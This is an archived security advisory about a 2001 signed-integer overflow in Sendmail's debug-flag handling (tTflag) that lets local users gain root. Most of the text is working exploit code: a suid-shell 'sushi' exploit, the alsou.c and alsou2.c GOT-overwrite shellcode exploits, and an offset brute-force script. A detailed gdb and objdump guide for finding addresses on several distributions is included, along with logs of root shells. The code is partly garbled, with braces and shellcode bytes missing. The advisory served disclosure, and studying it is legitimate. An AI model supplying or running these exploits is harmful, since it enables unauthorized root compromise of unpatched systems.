

    Sendmail 8.12beta7, 8.12beta5, 8.12beta16, 8.12beta12, 8.12beta10, 8.11.5, 8.11.4, 8.11.3, 8.11.2, 8.11.1, 8.11


    This alert has been posted to Bugtraq as our public release of the
    vulnerability discovered  in Sendmail  by Cade  Cairns.   Sendmail
    contains an input validation error, may lead to the  execution  of
    arbitrary code with elevated privileges.  Local users may be  able
    to write arbitrary data  to process memory, possibly  allowing the
    execution of code/commands with elevated privileges.

    An  input   validation  error   exists  in   Sendmail's  debugging
    functionality.   The problem  is the  result of  the use of signed
    integers in the program's tTflag() function, which is  responsible
    for processing arguments supplied  from the command line  with the
    '-d'  switch  and  writing  the  values  to  it's  internal "trace
    vector."  The vulnerability exists because it is possible to cause
    a signed integer overflow by  supplying a large numeric value  for
    the 'category' part of the debugger arguments.  The numeric  value
    is used as an index for the trace vector.

    Before the vector  is written to,  a check is  performed to ensure
    that the supplied index value is not greater than the size of  the
    vector.  However, because a signed integer comparison is used,  it
    is possible to  bypass the check  by supplying the  signed integer
    equivalent of  a negative  value.   This may  allow an attacker to
    write data  to anywhere  within a  certain range  of locations  in
    process memory.

    Because  the  '-d'  command-line  switch  is  processed before the
    program  drops  its  elevated  privileges,  this  could  lead to a
    full system compromise.  This vulnerability has been  successfully
    exploited in a laboratory environment.

    An attacker with  local access must  determine the memory  offsets
    of the  program's internal  tTdvect variable  and the  location to
    which he or she wishes to have data written.

    The attacker must craft  in architecture specific binary  code the
    commands (or  'shellcode') to  be executed  with higher privilege.
    The attacker  must then  run the  program, using  the '-d' flag to
    overwrite  a  function  return  address  with  the location of the
    supplied shellcode.

    Following  is  a  simple  slack  sendmail  exploit  (rh 7.1 offset
    also included) it's so funny to see an old bug striking again...


    cp -f /bin/bash $TMPDIR/sushi

    umask 022
    mkdir -p $TMPDIR
    chmod 777 $TMPDIR

    cat <<_MUX_ >/tmp/x
    O QueueDirectory=$TMPDIR
    O ForwardPath=/no_forward_file
    R\$*	\$#local \$: \$1
    Mlocal, P=$EXECUTABLE, F=lsDFMAw5:/|@qSPfhn9, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL,
            T=DNS/RFC822/X-Unix, A=$EXECUTABLE


    gcc -o /tmp/sx1/owned owned.c
    gcc -o sxpl xp.c
    ls -la /tmp/sushi

    int main()

            chown("/tmp/sushi", 0, 0);
            chmod("/tmp/sushi", 04755);

       simple sendmail -d pokes generator by LucySoft.

       default offsets for slack 7.0 sendmail 8.11.2
       redhat linux 7.1 address = 0x080ca160
       in order to get offsets for sendmail you should look for some code like the following


    0x8080688 <tTflag+196>: mov    0x80b21f8,%edi
    0x808068e <tTflag+202>: dec    %edi
    0x808068f <tTflag+203>: mov    %edi,0xfffffff8(%ebp)
    0x8080692 <tTflag+206>: jmp    0x808069d <tTflag+217>
    0x8080694 <tTflag+208>: mov    0x80b21f4,%eax

				    this is the ConfFile ptr that will be overwritten
				    to point to the beginning of the debug array

				    after you found this, in gdb just x/4x 0x802b1f4
				    and you got the address...
				    redhat has stripped exe, and the machine code is using
				    different registers, but it's a piece of cake to find this
				    objdump -d /usr/sbin/sendmail > sm.asm and then search for
				    something like this
				    mov    %cl,(%edi,%eax,1)

    0x8080699 <tTflag+213>: mov    %bl,(%esi,%eax,1)
    0x808069c <tTflag+216>: inc    %esi
    0x808069d <tTflag+217>: cmp    0xfffffff8(%ebp),%esi
    0x80806a0 <tTflag+220>: jle    0x8080694 <tTflag+208>
    0x80806a2 <tTflag+222>: mov    (%edx),%al
    0x80806a4 <tTflag+224>: inc    %edx
    0x80806a5 <tTflag+225>: test   %al,%al


    #include <stdio.h>

    char* strcf = "/tmp/x";
    char str[1000];
    char tmp[100];
    char* user="root";
    unsigned long ConfFile = 0x80b9ae0;
    unsigned long offset = 19816;

    int main(int argc, char* argv[])
            int k, shift;
            unsigned long a, ax;

            k = 1;
            while (k < argc)
                    if ((!strncmp(argv[k], "-offset")) && (k + 1 < argc))
                            offset = atol(argv[k+1]);
                            printf("* offset=%d\n", offset);
                            k += 2;

                    if ((!strncmp(argv[k], "-address")) && (k + 1 < argc))
                            sscanf(argv[k + 1], "%lx", &ConfFile);
                            printf("* address=%x\n", ConfFile);
                            k += 2;


            strcpy(str, "echo  | /usr/sbin/sendmail ");

            for (k = 0; (k < strlen(strcf)) && (k < 100); k++)
                    sprintf(tmp, "-d%d.%d ", k, strcf[k]);
                    strcat(str, tmp);

            shift = 0;
            for (k = 0; k < 4; k++)
                    a = ((unsigned long)ConfFile >> shift) & 0x000000ff;
                    ax = 4294967295 - offset + k + 1;

                    sprintf(tmp, "-d%lu.%d ", ax, a);
                    strcat(str, tmp);
                    shift += 8;

            strcat(str, user);
            strcat(str, "\n");

            printf("you should have /tmp/sushi suid if everything worked fine...\n");

    Here's an another sendmail exploit for linux x86:

     * alsou.c
     * sendmail-8.11.x linux x86 exploit
     * To use this exploit you should know two numbers: VECT and GOT.
     * Use gdb to find the first:
     * $ gdb -q /usr/sbin/sendmail
     * (gdb) break tTflag
     * Breakpoint 1 at 0x8080629
     * (gdb) r -d1-1.1
     * Starting program: /usr/sbin/sendmail -d1-1.1
     * Breakpoint 1, 0x8080629 in tTflag ()
     * (gdb) disassemble tTflag
     * .............
     * 0x80806ea <tTflag+202>: dec    %edi
     * 0x80806eb <tTflag+203>: mov    %edi,0xfffffff8(%ebp)
     * 0x80806ee <tTflag+206>: jmp    0x80806f9 <tTflag+217>
     * 0x80806f0 <tTflag+208>: mov    0x80b21f4,%eax
     *                               ^^^^^^^^^^^^^^^^^^ address of VECT
     * 0x80806f5 <tTflag+213>: mov    %bl,(%esi,%eax,1)
     * 0x80806f8 <tTflag+216>: inc    %esi
     * 0x80806f9 <tTflag+217>: cmp    0xfffffff8(%ebp),%esi
     * 0x80806fc <tTflag+220>: jle    0x80806f0 <tTflag+208>
     * .............
     * (gdb) x/x 0x80b21f4
     * 0x80b21f4 <tTvect>:     0x080b9ae0
     *                        ^^^^^^^^^^^^^ VECT
     * Use objdump to find the second:
     * $ objdump -R /usr/sbin/sendmail |grep setuid
     * 0809e07c R_386_JUMP_SLOT   setuid
     * ^^^^^^^^^ GOT
     * Probably you should play with OFFSET to make exploit work.
     * Constant values, written in this code found for sendmail-8.11.4
     * on RedHat-6.2. For sendmail-8.11.0 on RedHat-6.2 try VECT = 0x080b9ae0 and
     * GOT = 0x0809e07c.
     * To get r00t type ./alsou and then press Ctrl+C.
     * grange <>

    #include <sys/types.h>
    #include <stdlib.h>

    #define OFFSET 1000
    #define VECT 0x080baf20
    #define GOT 0x0809f544

    #define NOPNUM 1024

    char shellcode[] =

    unsigned int get_esp()
	    __asm__("movl %esp,%eax");

    int main(int argc, char *argv[])
	    char *egg, s[256], tmp[256], *av[3], *ev[2];
	    unsigned int got = GOT, vect = VECT, ret, first, last, i;

	    egg = (char *)malloc(strlen(shellcode) + NOPNUM + 5);
	    if (egg == NULL) {
	    sprintf(egg, "EGG=");
	    memset(egg + 4, 0x90, NOPNUM);
	    sprintf(egg + 4 + NOPNUM, "%s", shellcode);

	    ret = get_esp() + OFFSET;

	    sprintf(s, "-d");
	    first = -vect - (0xffffffff - got + 1);
	    last = first;
	    while (ret) {
		    i = ret & 0xff;
		    sprintf(tmp, "%u-%u.%u-", first, last, i);
		    strcat(s, tmp);
		    last = ++first;
		    ret = ret >> 8;
	    s[strlen(s) - 1] = '\0';

	    av[0] = "/usr/sbin/sendmail";
	    av[1] = s;
	    av[2] = NULL;
	    ev[0] = egg;
	    ev[1] = NULL;
	    execve(*av, av, ev);

    Following is  the 'alsou.c'   sendmail 8.11.x  (x<=5) xploit  with
    some very slight modifications:
    - extensive documentation and example  on how to get this  to work
      on several distros / sendmail versions=20
    - working on default SuSE 7.2 (sendmail 8.11.3):
    - also  included  working  parameters  for  SuSE 6.4 with  *custom
      compiled* sendmail 8.11.2:
    - allows  to  give  offset  in  command line. Use with  'smxploit'
      script (also included)  in order to  find correct offset.   This
      will be necessary in different distros / sendmail versions
    - QUICK GUIDE for  finding propper exploitation values  (VECT, GOT
      and OFFSET):
      ==> CASE A: Non-stripped binary:
      ==> CASE  B: Stripped  binary (this  is the  default on  several

    # by RoMaNSoFt <>
    # 24.08.2001
    echo "Trying from $1 to $2 incrementing by $3"
    while [ $OFFSET -le $2 ] ; do
      ./alsou2 $OFFSET
      OFFSET=`expr $OFFSET + $3`
     * alsou2.c
     * This is the 'alsou.c' sendmail 8.11.x xploit with some very slight modifications:
     * - extensive documentation and example on how to get this to work on several distros / sm versions
     * - working on default SuSE 7.2 (sendmail 8.11.3):
     *    roman@stuka:~ > gcc -o alsou2 alsou2.c
     *    roman@stuka:~ > ./alsou2
     *	  Offset=2500
     *	  Recipient names must be specified
     *    <ctrl-c>
     *	  sh-2.05#
     * - also included working parameters for SuSE 6.4 with *custom compiled* sendmail 8.11.2:
     *    [change the #define lines: comment and uncomment the corresponding lines]
     *    roman@emilio:~ > gcc -o alsou2 alsou2.c
     *    roman@emilio:~ > ./alsou2
     *    Offset=1500
     *    Recipient names must be specified
     *    <ctrl-c>
     *    sh-2.03#
     * - allows to give offset in command line. Use with 'smxploit' script in order to find correct offset.
     * This will be necessary in different distros / sendmail versions to find VECT, GOT and OFFSET parameters.
     * Please read carefully the following section.
     * QUICK GUIDE for finding propper exploitation values
     * ===================================================
     * ==> CASE A: Non-stripped binary:
     * 1.- Find VECT and GOT using gdb (as explained in alsou.c original comments). Note that you cannot directly
     * debug /usr/sbin/sendmail being setuid by root from a non-root account. In this case you'll simply have to:
     * $ cp /usr/sbin/sendmail /tmp/sendmail
     * $ gdb -q /tmp/sendmail
     * ...
     * (thanks to grange for the tip)
     * 2.- Use 'smxploit' script to find the offset:
     *    [modify source and include VECT and GOT values found on step one]
     *    roman@emilio:~ > gcc -o alsou2 alsou2.c
     *    roman@emilio:~ > ./smxploit 500 3500 1000
     *    Trying from 500 to 3500 incrementing by 1000
     *    Offset=500
     *    Recipient names must be specified
     *    <ctrl-c>
     *    ./smxploit: line 10: 31767 Violación de segmento   ./alsou2 $OFFSET
     *    Offset=1500
     *    Recipient names must be specified
     *    <ctrl-c>
     *    sh-2.03#
     *  You'll have to press ctrl-c several times. Yes, this could be improved... but do it by yourself :-)
     * ==> CASE B: Stripped binary (this is the default on several distros):
     * 1.- Find VECT and GOT:
     *    roman@stuka:~ > id
     *    uid=501(roman) gid=100(users) grupos=100(users)
     *    roman@stuka:~ > cp /usr/sbin/sendmail /tmp/sendmail
     *    roman@stuka:~ > objdump -d /tmp/sendmail >sm
     *    objdump: /tmp/sendmail: no symbols
     *    [first we try:]
     *    roman@stuka:~ > grep "mov.*%.*,(%.*,%.*,1)" sm | wc -l
     *         88
     *    [too many found mov's but anyway:]
     *    roman@stuka:~ > grep -A 1 -B 1 "mov.*%.*,(%.*,%.*,1)" sm | less
     *    ...
     *    --
     *     8095f53:       a1 80 1a 17 08          mov    0x8171a80,%eax
     *     ^^^^^^^                                       ^^^^^^^^^
     *     8095f58:       88 1c 06                mov    %bl,(%esi,%eax,1)
     *     8095f5b:       46                      inc    %esi
     *    -
     *    ...
     *    [we've determined that we can set the breakpoint at 0x8095f53 and do the x/x 0x8171a80]
     *    [another possible way:]
     *    roman@stuka:~ > grep "mov.*%.l,(%e.i,%eax,1)" sm
     *     8095f58:       88 1c 06                mov    %bl,(%esi,%eax,1)
     *     811a212:       88 14 07                mov    %dl,(%edi,%eax,1)
     *     811dcf4:       88 0c 06                mov    %cl,(%esi,%eax,1)
     *    [and now we have only three possible mov's ;-)]
     *    roman@stuka:~ > gdb -q /tmp/sendmail
     *    (no debugging symbols found)...(gdb) break *0x8095f53
     *    Breakpoint 1 at 0x8095f53
     *    (gdb) r -d1-1.1
     *    Starting program: /tmp/sendmail -d1-1.1
     *    (no debugging symbols found)...(no debugging symbols found)...
     *    (no debugging symbols found)...(no debugging symbols found)...
     *    (no debugging symbols found)...(no debugging symbols found)...
     *    (no debugging symbols found)...(no debugging symbols found)...
     *    (no debugging symbols found)...(no debugging symbols found)...
     *    (no debugging symbols found)...
     *    Breakpoint 1, 0x8095f53 in getopt ()
     *    (gdb) x/x 0x8171a80
     *    0x8171a80 <stdin+82400>:        0x0817cec0
     *                                    ^^^^^^^^^^
     *    [so we have VECT=0x0817cec0]
     *    (gdb) quit
     *    The program is running.  Exit anyway? (y or n) y
     *    roman@stuka:~ > objdump -R /tmp/sendmail | grep setuid
     *    0815d358 R_386_JUMP_SLOT   setuid
     *    ^^^^^^^^
     *    [so GOT=0x0815d358]
     *    roman@stuka:~ >
     *    [now we re-compile this source with a default OFFSET=1000]
     * 2.- Find OFFSET:
     *    roman@stuka:~ > ./smxploit 500 3500 1000
     *    Trying from 500 to 3500 incrementing by 1000
     *    Offset=500
     *    Recipient names must be specified
     *    <ctrl-c>
     *    ./smxploit: line 10: 27273 Violacisn de segmento   ./alsou2 $OFFSET
     *    Offset=1500
     *    Recipient names must be specified
     *    <ctrl-c>
     *    ./smxploit: line 10: 27275 Violacisn de segmento   ./alsou2 $OFFSET
     *    Offset=2500
     *    Recipient names must be specified
     *    <ctrl-c>
     *    sh-2.05#
     * [so we have OFFSET=2500. And we're r00t :-)]
     * RoMaNSoFt <>
     * Spain, 26.08.2001
     * ---------------------------------------------
     * [ Original alsou.c comments ]
     * sendmail-8.11.x linux x86 exploit
     * To use this exploit you should know two numbers: VECT and GOT.
     * Use gdb to find the first:
     * $ gdb -q /usr/sbin/sendmail
     * (gdb) break tTflag
     * Breakpoint 1 at 0x8080629
     * (gdb) r -d1-1.1
     * Starting program: /usr/sbin/sendmail -d1-1.1
     * Breakpoint 1, 0x8080629 in tTflag ()
     * (gdb) disassemble tTflag
     * .............
     * 0x80806ea <tTflag+202>: dec    %edi
     * 0x80806eb <tTflag+203>: mov    %edi,0xfffffff8(%ebp)
     * 0x80806ee <tTflag+206>: jmp    0x80806f9 <tTflag+217>
     * 0x80806f0 <tTflag+208>: mov    0x80b21f4,%eax
     *                               ^^^^^^^^^^^^^^^^^^ address of VECT
     * 0x80806f5 <tTflag+213>: mov    %bl,(%esi,%eax,1)
     * 0x80806f8 <tTflag+216>: inc    %esi
     * 0x80806f9 <tTflag+217>: cmp    0xfffffff8(%ebp),%esi
     * 0x80806fc <tTflag+220>: jle    0x80806f0 <tTflag+208>
     * .............
     * (gdb) x/x 0x80b21f4
     * 0x80b21f4 <tTvect>:     0x080b9ae0
     *                        ^^^^^^^^^^^^^ VECT
     * Use objdump to find the second:
     * $ objdump -R /usr/sbin/sendmail |grep setuid
     * 0809e07c R_386_JUMP_SLOT   setuid
     * ^^^^^^^^^ GOT
     * Probably you should play with OFFSET to make exploit work.
     * Constant values, written in this code found for sendmail-8.11.4
     * on RedHat-6.2. For sendmail-8.11.0 on RedHat-6.2 try VECT = 0x080b9ae0 and
     * GOT = 0x0809e07c.
     * To get r00t type ./alsou and then press Ctrl+C.
     * grange <>
    #include <sys/types.h>
    #include <stdlib.h>
    /* SuSE 7.2 Default (sendmail 8.11.3) */
    #define OFFSET 2500
    #define VECT 0x0817cec0
    #define GOT 0x0815d358
    /* SuSE 6.4 with (custom) sendmail 8.11.2
     * (note SuSE 6.4 *default* is not vulnerable because it ships sendmail 8.9.3 which is not vulnerable) */
    // #define OFFSET 1500
    // #define VECT 0x080bdbe0
    // #define GOT 0x080a2200
    /* RedHat 6.2 with sendmail 8.11.4 */
    // #define OFFSET 1000
    // #define VECT 0x080baf20
    // #define GOT 0x0809f544
    #define NOPNUM 1024
    char shellcode[] =
    unsigned int get_esp()
	    __asm__("movl %esp,%eax");
    int main(int argc, char *argv[])
	    char *egg, s[256], tmp[256], *av[3], *ev[2];
	    unsigned int got = GOT, vect = VECT, ret, first, last, i, offset;
	    egg = (char *)malloc(strlen(shellcode) + NOPNUM + 5);
	    if (egg == NULL) {
	    sprintf(egg, "EGG=");
	    memset(egg + 4, 0x90, NOPNUM);
	    sprintf(egg + 4 + NOPNUM, "%s", shellcode);
	    if(argc > 1)
		    offset = atoi(argv[1]);
     		    offset = OFFSET;
	    printf("Offset=%d\n", offset);
	    ret = get_esp() + offset;
	    sprintf(s, "-d");
	    first = -vect - (0xffffffff - got + 1);
	    last = first;
	    while (ret) {
		    i = ret & 0xff;
		    sprintf(tmp, "%u-%u.%u-", first, last, i);
		    strcat(s, tmp);
		    last = ++first;
		    ret = ret >> 8;
	    s[strlen(s) - 1] = '\0';
	    av[0] = "/usr/sbin/sendmail";
	    av[1] = s;
	    av[2] = NULL;
	    ev[0] = egg;
	    ev[1] = NULL;
	    execve(*av, av, ev);


    This  vulnerability,  present  in  sendmail  open  source versions
    between 8.11.0 and 8.11.5 has been corrected in 8.11.6.   sendmail
    8.12.0.Beta users  should upgrade  to 8.12.0.Beta19.   The problem
    was not present in 8.10 or earlier versions.  However, as  always,
    we recommend using the latest version.  Note that this problem  is
    not remotely  exploitable.   Additionally, sendmail  8.12 will  no
    longer  uses  a  set-user-id  root  binary  by  default.   Updated
    packages that rectify this issue are available from the vendor:

    For SuSE:

    For Conectiva Linux:

    For Immunix OS:

    For Caldera: